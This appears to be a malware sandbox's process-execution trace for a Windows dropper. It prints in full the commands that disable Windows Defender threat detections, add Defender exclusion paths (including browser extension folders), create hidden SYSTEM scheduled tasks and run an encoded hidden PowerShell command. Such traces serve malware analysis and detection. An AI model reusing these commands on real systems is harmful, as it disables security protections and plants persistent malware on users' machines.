C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "fxxmGIjnSbKlnnNZc" /SC once /ST 05:00:59 /RU "SYSTEM" /TR "\"C:\Windows\Temp\bpNowFaEeWbSfYmu\mevTngXuZkHKOTD\AXChDNl.exe\" MC /pTOFdidyt 525403 /S" /V1 /F2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:2304
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "fxxmGIjnSbKlnnNZc"2⤵PID:4012
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5180 -s 6002⤵
- Program crash
PID:2008
-
-
[depth 1] C:\Users\Admin\AppData\Local\Temp\7zSBF45.tmp\Install.exe  C:\Users\Admin\AppData\Local\Temp\7zSBF45.tmp\Install.exe tg /udfdidUwig 385132 /S
- Executes dropped EXE
- Drops file in System32 directory
PID:5204
[depth 2] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:5372
[depth 3] C:\Windows\SysWOW64\cmd.exe  "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32  PID:5556
[depth 4] C:\Windows\SysWOW64\reg.exe  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32  PID:4492
[depth 3] C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64  PID:5768
[depth 3] C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32  PID:5732
[depth 3] C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64  PID:5748
[depth 3] C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32  PID:5744
[depth 3] C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64  PID:5888
[depth 3] C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32  PID:5872
[depth 3] C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64  PID:5892
[depth 3] C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32  PID:5904
[depth 3] C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64  PID:6028
[depth 3] C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32  PID:6088
[depth 3] C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64  PID:6104
[depth 3] C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32  PID:5960
[depth 3] C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64  PID:5976
[depth 3] C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32  PID:5992
[depth 3] C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64  PID:6008
[depth 3] C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32  PID:6024
[depth 3] C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64  PID:6044
[depth 3] C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32  PID:6060
[depth 3] C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64  PID:6072
[depth 3] C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32  PID:6128
[depth 3] C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64  PID:2664
[depth 3] C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32  PID:4552
[depth 3] C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64  PID:1288
[depth 3] C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32  PID:2488
[depth 3] C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64  PID:1732
[depth 3] C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32  PID:772
[depth 3] C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64  PID:4708
[depth 2] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GGkIPDNvPhOAuwTEsUR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GGkIPDNvPhOAuwTEsUR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IFfyxFxqzCUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IFfyxFxqzCUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RmqlacUQU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RmqlacUQU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XYcGyWaqnbhU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XYcGyWaqnbhU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qioMUrUoKCErC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qioMUrUoKCErC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\ERCUCymjGgNKOwVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\ERCUCymjGgNKOwVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\bwQFAaCxmrWDaWaAS\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\bwQFAaCxmrWDaWaAS\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\OIWUzfnoSeVAWsLl\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\OIWUzfnoSeVAWsLl\" /t REG_DWORD /d 0 /reg:64;"
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2076
[depth 3] C:\Windows\SysWOW64\cmd.exe  "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GGkIPDNvPhOAuwTEsUR" /t REG_DWORD /d 0 /reg:32  PID:3600
[depth 4] C:\Windows\SysWOW64\reg.exe  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GGkIPDNvPhOAuwTEsUR" /t REG_DWORD /d 0 /reg:32  PID:1360
[depth 3] C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GGkIPDNvPhOAuwTEsUR" /t REG_DWORD /d 0 /reg:64  PID:3388
[depth 3] C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IFfyxFxqzCUn" /t REG_DWORD /d 0 /reg:32  PID:3512
[depth 3] C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IFfyxFxqzCUn" /t REG_DWORD /d 0 /reg:64  PID:1096
[depth 3] C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RmqlacUQU" /t REG_DWORD /d 0 /reg:32  PID:4548
[depth 3] C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RmqlacUQU" /t REG_DWORD /d 0 /reg:64  PID:4596
[depth 3] C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XYcGyWaqnbhU2" /t REG_DWORD /d 0 /reg:32  PID:4864
[depth 3] C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XYcGyWaqnbhU2" /t REG_DWORD /d 0 /reg:64  PID:5000
[depth 3] C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qioMUrUoKCErC" /t REG_DWORD /d 0 /reg:32  PID:5148
[depth 3] C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qioMUrUoKCErC" /t REG_DWORD /d 0 /reg:64  PID:5168
[depth 3] C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\ERCUCymjGgNKOwVB /t REG_DWORD /d 0 /reg:32  PID:2760
[depth 3] C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\ERCUCymjGgNKOwVB /t REG_DWORD /d 0 /reg:64  PID:5232
[depth 3] C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32  PID:488
[depth 3] C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64  PID:5228
[depth 3] C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32  PID:5268
[depth 3] C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64  PID:5284
[depth 3] C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\bwQFAaCxmrWDaWaAS /t REG_DWORD /d 0 /reg:32  PID:5304
[depth 3] C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\bwQFAaCxmrWDaWaAS /t REG_DWORD /d 0 /reg:64  PID:5312
[depth 3] C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\OIWUzfnoSeVAWsLl /t REG_DWORD /d 0 /reg:32  PID:5336
[depth 3] C:\Windows\SysWOW64\reg.exe  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\OIWUzfnoSeVAWsLl /t REG_DWORD /d 0 /reg:64  PID:5436
[depth 2] C:\Windows\SysWOW64\schtasks.exe  schtasks /CREATE /TN "giQwGroiL" /SC once /ST 08:51:43 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
- Scheduled Task/Job: Scheduled Task
PID:1072
[depth 2] C:\Windows\SysWOW64\schtasks.exe  schtasks /run /I /tn "giQwGroiL"  PID:5512
[depth 2] C:\Windows\SysWOW64\schtasks.exe  schtasks /DELETE /F /TN "giQwGroiL"  PID:6076
[depth 2] C:\Windows\SysWOW64\schtasks.exe  schtasks /CREATE /TN "LOHPKuWKJcOzSYPZu" /SC once /ST 08:43:22 /RU "SYSTEM" /TR "\"C:\Windows\Temp\OIWUzfnoSeVAWsLl\bLTYzkLUOZBMYfc\OklvlTo.exe\" mM /xJnNdiddy 385132 /S" /V1 /F
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:5996
[depth 2] C:\Windows\SysWOW64\schtasks.exe  schtasks /run /I /tn "LOHPKuWKJcOzSYPZu"  PID:5576
[depth 2] C:\Windows\SysWOW64\WerFault.exe  C:\Windows\SysWOW64\WerFault.exe -u -p 5204 -s 784
- Program crash
PID:5456
[depth 1] C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe  C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5224
[depth 1] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
- Command and Scripting Interpreter: PowerShell
PID:5532
[depth 2] C:\Windows\system32\gpupdate.exe  "C:\Windows\system32\gpupdate.exe" /force  PID:1112
[depth 1] C:\Windows\system32\svchost.exe  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc  PID:4820
[depth 1] C:\Windows\system32\svchost.exe  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum  PID:940
[depth 1] C:\Windows\system32\gpscript.exe  gpscript.exe /RefreshSystemParam  PID:5464
[depth 1] C:\Windows\Temp\OIWUzfnoSeVAWsLl\bLTYzkLUOZBMYfc\OklvlTo.exe  C:\Windows\Temp\OIWUzfnoSeVAWsLl\bLTYzkLUOZBMYfc\OklvlTo.exe mM /xJnNdiddy 385132 /S
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:6072
[depth 2] C:\Windows\SysWOW64\schtasks.exe  schtasks /DELETE /F /TN "beIeSqxTUIgkrqSZzo"  PID:3880
[depth 2] C:\Windows\SysWOW64\cmd.exe  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &  PID:6020
[depth 3] C:\Windows\SysWOW64\forfiles.exe  forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"  PID:5644
[depth 4] C:\Windows\SysWOW64\cmd.exe  /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True  PID:6092
[depth 5] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4768
[depth 6] C:\Windows\SysWOW64\Wbem\WMIC.exe  "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True  PID:5608
[depth 2] C:\Windows\SysWOW64\schtasks.exe  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\RmqlacUQU\DhfJYe.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ayCOowYLgjutNKI" /V1 /F
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:5568
[depth 2] C:\Windows\SysWOW64\schtasks.exe  schtasks /CREATE /TN "ayCOowYLgjutNKI2" /F /xml "C:\Program Files (x86)\RmqlacUQU\QCNqlOa.xml" /RU "SYSTEM"
- Scheduled Task/Job: Scheduled Task
PID:2036
[depth 2] C:\Windows\SysWOW64\schtasks.exe  schtasks /END /TN "ayCOowYLgjutNKI"  PID:3912
[depth 2] C:\Windows\SysWOW64\schtasks.exe  schtasks /DELETE /F /TN "ayCOowYLgjutNKI"  PID:5956
[depth 2] C:\Windows\SysWOW64\schtasks.exe  schtasks /CREATE /TN "AvuuMZnAgveLTP" /F /xml "C:\Program Files (x86)\XYcGyWaqnbhU2\jYoplUh.xml" /RU "SYSTEM"
- Scheduled Task/Job: Scheduled Task
PID:5216
